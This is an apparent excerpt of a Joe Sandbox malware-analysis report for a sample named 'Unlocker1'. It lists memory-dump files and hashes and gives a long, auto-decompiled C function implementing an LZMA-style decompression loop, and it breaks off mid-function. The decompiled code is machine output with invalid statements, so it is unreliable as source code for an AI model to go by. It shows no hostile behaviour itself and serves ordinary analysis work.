                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406369

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                                                              • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                                                                                                                                              • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                                                                                                                                              • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004062B1 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004062B1() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
